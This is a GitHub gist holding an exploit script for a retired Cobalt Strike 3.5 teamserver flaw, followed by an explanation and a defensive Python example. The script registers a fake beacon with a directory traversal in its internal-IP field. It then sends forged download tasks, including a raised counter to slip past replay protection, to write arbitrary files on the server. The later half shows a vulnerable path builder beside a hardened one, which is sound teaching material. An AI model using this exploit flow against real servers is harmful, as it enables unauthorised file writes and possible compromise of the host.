@olliencc
Last active August 5, 2021 15:51
Retired Cobalt Strike 3.5 exploit example
import os

# Note: generate_keys, Metadata, register_beacon, build_download_task,
# beacon_checkin, build_download_data, counter and the parsed `args` object
# come from the author's surrounding tooling and are not included in this gist;
# this snippet only shows the exploit flow.

# First we need to register a beacon with a directory traversal in the internal
# IP address field. The teamserver uses that field as a path component when it
# stores beacon downloads, so the "../" segments walk out of the download
# directory and into the directory of the file we want to write.
ip_address = "../../../../../../%s" % os.path.split(args.filepath)[0]
# Generate symmetric keys (used later to encrypt/authenticate the fake tasks)
raw_aes_keys = os.urandom(16)
aes_key, hmac_key = generate_keys(raw_aes_keys)
m = Metadata(public_key=args.public_key, cs_version=3)
m.public_key = args.public_key
m.bid = args.bid
m.pid = args.pid
m.ver = "10.0"
m.intz = ip_address
m.comp = args.computer
m.user = args.username
m.is64 = '1' # 64-bit OS
m.barch = '1' # 64-bit beacon
m.raw_aes_keys = raw_aes_keys
m.calculate_aes()
enc = m.pack()
# Register the beacon
print("[*] Staging beacon ..")
register_beacon(enc, args.target, args.uri, args.host, args.ssl)
# Now we need to push a DOWNLOAD_START response to cause a file write
print("[*] Creating file ..")
data, fid = build_download_task(os.path.split(args.filepath)[1], aes_key, hmac_key)
# Send it to the server. This is the equivalent of touch(filepath).
# submit.php should be replaced with the malleable C2 setting if applicable
beacon_checkin(args.target, 'submit.php', data, args.bid, args.host, args.ssl)
# Build another task which is going to write the data to the touched file.
# We force the counter to be higher than the last task's so the message is not
# discarded by the server's replay protection.
print("[*] Sending data ..")
data = build_download_data(args.filedata, fid, aes_key, hmac_key, counter()+100)
# Fire it..
beacon_checkin(args.target, 'submit.php', data, args.bid, args.host, args.ssl)
print("[+] Done!")
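The bug the gist abuses is a beacon-controlled string (the internal IP field) being joined straight into a server-side file path. The following Python 3 snippet is an added example, not part of the gist or of Cobalt Strike's code: it places a naive path-building routine beside a hardened one and feeds both the same traversal value shaped like the one the gist builds. The base directory, file names and the `naive_download_path` / `hardened_download_path` helpers are constructed for illustration and are assumptions, not the real teamserver layout or API.

```python
import ipaddress
import posixpath
import re

# Constructed base directory for this example (hypothetical; the page does not
# give the real teamserver download layout).
BASE_DIR = "/opt/cobaltstrike/downloads"

# Constructed traversal value in the shape the gist builds:
# "../../../../../../" followed by the directory we want to land in.
TRAVERSAL_INTZ = "../../../../../../tmp"


def naive_download_path(base_dir, intz, filename):
    """Vulnerable shape (assumed, for illustration): trust the beacon-supplied
    internal IP and file name as path components. normpath collapses the ".."
    segments, so a crafted intz value escapes base_dir entirely."""
    return posixpath.normpath(posixpath.join(base_dir, intz, filename))


class UntrustedPathError(ValueError):
    """Raised when beacon-supplied metadata would produce an unsafe path."""


# Conservative file-name charset: no separators, no NUL, no control characters.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,255}$")


def hardened_download_path(base_dir, intz, filename):
    """Hardened shape: the directory component must parse as an IP address,
    the file name must match a strict charset, and the resolved path must
    still sit inside base_dir (defence in depth even if the first two checks
    are ever loosened)."""
    try:
        ip = ipaddress.ip_address(intz)
    except ValueError:
        raise UntrustedPathError("intz is not an IP address: %r" % intz)
    if filename in (".", "..") or not _SAFE_NAME.match(filename):
        raise UntrustedPathError("rejecting file name: %r" % filename)
    # str(ip) is the canonical textual form; no separator or ".." survives
    # ip_address(), so the directory component is fully under our control.
    candidate = posixpath.normpath(posixpath.join(base_dir, str(ip), filename))
    base = posixpath.normpath(base_dir)
    if posixpath.commonpath([base, candidate]) != base:
        raise UntrustedPathError("path escapes base dir: %r" % candidate)
    return candidate


def escapes_base(base_dir, path):
    """True if `path` resolves outside `base_dir` (lexically)."""
    base = posixpath.normpath(base_dir)
    return posixpath.commonpath([base, posixpath.normpath(path)]) != base


def hardened_rejects(base_dir, intz, filename):
    """Convenience for checks: True if the hardened builder refuses the input."""
    try:
        hardened_download_path(base_dir, intz, filename)
    except UntrustedPathError:
        return True
    return False


if __name__ == "__main__":
    bad = naive_download_path(BASE_DIR, TRAVERSAL_INTZ, "evil.txt")
    print("naive   :", bad, "(escapes base: %s)" % escapes_base(BASE_DIR, bad))
    print("hardened:", hardened_download_path(BASE_DIR, "10.0.0.5", "loot.txt"))
    print("hardened rejects traversal:", hardened_rejects(BASE_DIR, TRAVERSAL_INTZ, "evil.txt"))
```

Note that the `commonpath` check is lexical: if the download directory can contain attacker-created symlinks, resolve with `os.path.realpath` before comparing, and keep the IP and file-name validation in front of it regardless, since a path that merely stays under the base directory can still overwrite another beacon's loot.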